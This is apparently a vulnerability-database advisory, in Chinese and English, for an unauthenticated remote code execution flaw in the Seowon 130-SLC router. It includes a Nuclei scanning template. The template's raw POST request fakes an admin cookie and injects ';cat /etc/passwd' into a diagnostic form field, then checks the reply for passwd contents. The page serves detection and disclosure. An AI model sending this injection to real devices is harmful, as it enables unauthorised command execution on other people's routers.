seowon-router-rce: Seowon 130-SLC router - Remote Code Execution

日期: 2025-08-01 | 影响软件: Seowon 130-SLC router | POC: 已公开

漏洞描述

Seowon 130-SLC router lets remote attackers execute commands without authentication as admin users via the router ip & Port(if available) in the request.

PoC代码[已公开]

id: seowon-router-rce

info:
  name: Seowon 130-SLC router - Remote Code Execution
  author: gy741
  severity: critical
  description: |
    Seowon 130-SLC router lets remote attackers execute commands without authentication as admin users via the router ip & Port(if available) in the request.
  reference:
    - https://www.exploit-db.com/exploits/50295
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-77
  metadata:
    max-request: 1
  tags: unauth,iot,edb,rce,seowon,router,vuln

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{BaseURL}}/diagnostic.html?t=201701020919
        Cookie: product=cpe; cpe_buildTime=201701020919; vendor=mobinnet; connType=lte; cpe_multiPdnEnable=1; cpe_lang=en; cpe_voip=0; cpe_cwmpc=1; cpe_snmp=1; filesharing=0; cpe_switchEnable=0; cpe_IPv6Enable=0; cpe_foc=0; cpe_vpn=1; cpe_httpsEnable=0; cpe_internetMTUEnable=0; cpe_opmode=lte; sessionTime=1631653385102; cpe_login=admin

        Command=Diagnostic&traceMode=trace&reportIpOnly=0&pingPktSize=56&pingTimeout=30&pingCount=4&ipAddr=&maxTTLCnt=30&queriesCnt=;cat /etc/passwd&reportIpOnlyCheckbox=on&btnApply=Apply&T=1631653402928

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a00463044022041af25ba01a088f312700085b28b9acbb6eff1a3f8a9392031ab351613a7230c022043b37b4fc291ac0aca07e8ede58b19367f8a4b5ed942ffd6da9c0ac21848a7ae:922c64590222798bb761d5b6d8e72950

相关漏洞推荐